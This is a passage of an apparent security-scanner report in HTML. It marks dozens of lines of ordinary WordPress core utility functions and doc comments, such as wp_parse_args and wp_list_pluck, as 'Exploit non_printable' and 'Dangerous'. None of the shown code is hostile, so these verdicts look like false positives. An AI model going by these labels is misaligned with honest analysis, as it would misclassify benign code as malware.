</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">Merged user defined values with defaults</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_parse_args</span><span style="color: #007700">( </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #0000BB">$defaults </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4953</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_merge</span><span style="color: #007700">( </span><span style="color: #0000BB">$defaults</span><span style="color: #007700">, </span><span style="color: #0000BB">$parsed_args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4955</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$parsed_args</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4964</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array Array </span><span style="color: #0000BB">of values</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_parse_list</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_list </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4968</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_split</span><span style="color: #007700">( </span><span style="color: #DD0000">'/[\s,]+/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$input_list</span><span style="color: #007700">, -</span><span style="color: #0000BB">1</span><span style="color: #007700">, </span><span style="color: #0000BB">PREG_SPLIT_NO_EMPTY </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4974</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$input_list</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 497</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">number_format_i18n</span><span style="color: #007700">( </span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">$mag</span><span style="color: #007700">, </span><span style="color: #0000BB">$decimals </span><span style="color: #007700">) . </span><span style="color: #DD0000">' ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$unit</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4984</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int</span><span style="color: #007700">[] </span><span style="color: #0000BB">Sanitized </span><span style="color: #007700">array </span><span style="color: #0000BB">of IDs</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4986</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_parse_id_list</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_list </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4989</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_unique</span><span style="color: #007700">( </span><span style="color: #0000BB">array_map</span><span style="color: #007700">( </span><span style="color: #DD0000">'absint'</span><span style="color: #007700">, </span><span style="color: #0000BB">$input_list </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">[] </span><span style="color: #0000BB">Sanitized </span><span style="color: #007700">array </span><span style="color: #0000BB">of slugs</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$datetime</span><span style="color: #007700">-></span><span style="color: #0000BB">getTimestamp</span><span style="color: #007700">() + </span><span style="color: #0000BB">$datetime</span><span style="color: #007700">-></span><span style="color: #0000BB">getOffset</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5001</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_parse_slug_list</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_list </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_unique</span><span style="color: #007700">( </span><span style="color: #0000BB">array_map</span><span style="color: #007700">( </span><span style="color: #DD0000">'sanitize_title'</span><span style="color: #007700">, </span><span style="color: #0000BB">$input_list </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">The </span><span style="color: #007700">array </span><span style="color: #0000BB">slice</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5016</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_array_slice_assoc</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_array</span><span style="color: #007700">, </span><span style="color: #0000BB">$keys </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$slice</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5038</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_recursive_ksort</span><span style="color: #007700">( &</span><span style="color: #0000BB">$input_array </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">value </span><span style="color: #007700">if </span><span style="color: #0000BB">the path does not exist within the </span><span style="color: #007700">array,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5074</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">mixed The value from the path specified</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5076</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_array_get</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_array</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$default_value </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5079</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$default_value</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false</span><span style="color: #007700">, </span><span style="color: #0000BB">we check with </span><span style="color: #007700">`</span><span style="color: #DD0000">array_key_exists()</span><span style="color: #007700">`,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 511</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">false A human readable duration string</span><span style="color: #007700">, </span><span style="color: #0000BB">false on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 513</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">human_readable_duration</span><span style="color: #007700">( </span><span style="color: #0000BB">$duration </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5146</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_array_set</span><span style="color: #007700">( &</span><span style="color: #0000BB">$input_array</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is trying to replicate what</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5190</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is that we </span><span style="color: #007700">do </span><span style="color: #0000BB">some processing</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">should follow updates in the client</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5209</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string kebab</span><span style="color: #007700">-</span><span style="color: #0000BB">cased</span><span style="color: #007700">-</span><span style="color: #0000BB">string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5211</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_to_kebab_case</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_string </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5258</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">( </span><span style="color: #0000BB">implode</span><span style="color: #007700">( </span><span style="color: #DD0000">'-'</span><span style="color: #007700">, </span><span style="color: #0000BB">$matches</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">] ) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5268</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the variable is a </span><span style="color: #007700">list.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5270</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_is_numeric_array</span><span style="color: #007700">( </span><span style="color: #0000BB">$data </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">count</span><span style="color: #007700">( </span><span style="color: #0000BB">$string_keys </span><span style="color: #007700">) === </span><span style="color: #0000BB">0</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5291</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">can also retrieve</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5307</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">A </span><span style="color: #007700">list </span><span style="color: #0000BB">of objects </span><span style="color: #007700">or </span><span style="color: #0000BB">object fields</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5309</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_filter_object_list</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_list</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$operator </span><span style="color: #007700">= </span><span style="color: #DD0000">'and'</span><span style="color: #007700">, </span><span style="color: #0000BB">$field </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5311</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$util</span><span style="color: #007700">-></span><span style="color: #0000BB">get_output</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array Array </span><span style="color: #0000BB">of found values</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5351</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_list_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_list</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$operator </span><span style="color: #007700">= </span><span style="color: #DD0000">'AND' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_filter_object_list</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_list</span><span style="color: #007700">, </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #0000BB">$operator </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5358</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality </span><span style="color: #007700">and </span><span style="color: #0000BB">prototype of</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5369</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array Array </span><span style="color: #0000BB">of found values</span><span style="color: #007700">. If `</span><span style="color: #0000BB">$index_key</span><span style="color: #007700">` </span><span style="color: #0000BB">is set</span><span style="color: #007700">, </span><span style="color: #0000BB">an </span><span style="color: #007700">array </span><span style="color: #0000BB">of found values with keys</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5373</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_list_pluck</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_list</span><span style="color: #007700">, </span><span style="color: #0000BB">$field</span><span style="color: #007700">, </span><span style="color: #0000BB">$index_key </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5380</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$util</span><span style="color: #007700">-></span><span style="color: #0000BB">pluck</span><span style="color: #007700">( </span><span style="color: #0000BB">$field</span><span style="color: #007700">, </span><span style="color: #0000BB">$index_key </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5395</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">The sorted </span><span style="color: #007700">array.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5397</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_list_sort</span><span style="color: #007700">( </span><span style="color: #0000BB">$input_list</span><span style="color: #007700">, </span><span style="color: #0000BB">$orderby </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$order </span><span style="color: #007700">= </span><span style="color: #DD0000">'ASC'</span><span style="color: #007700">, </span><span style="color: #0000BB">$preserve_keys </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_date</span><span style="color: #007700">( </span><span style="color: #0000BB">$format</span><span style="color: #007700">, </span><span style="color: #0000BB">$datetime</span><span style="color: #007700">-></span><span style="color: #0000BB">getTimestamp</span><span style="color: #007700">(), </span><span style="color: #0000BB">$timezone </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5404</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
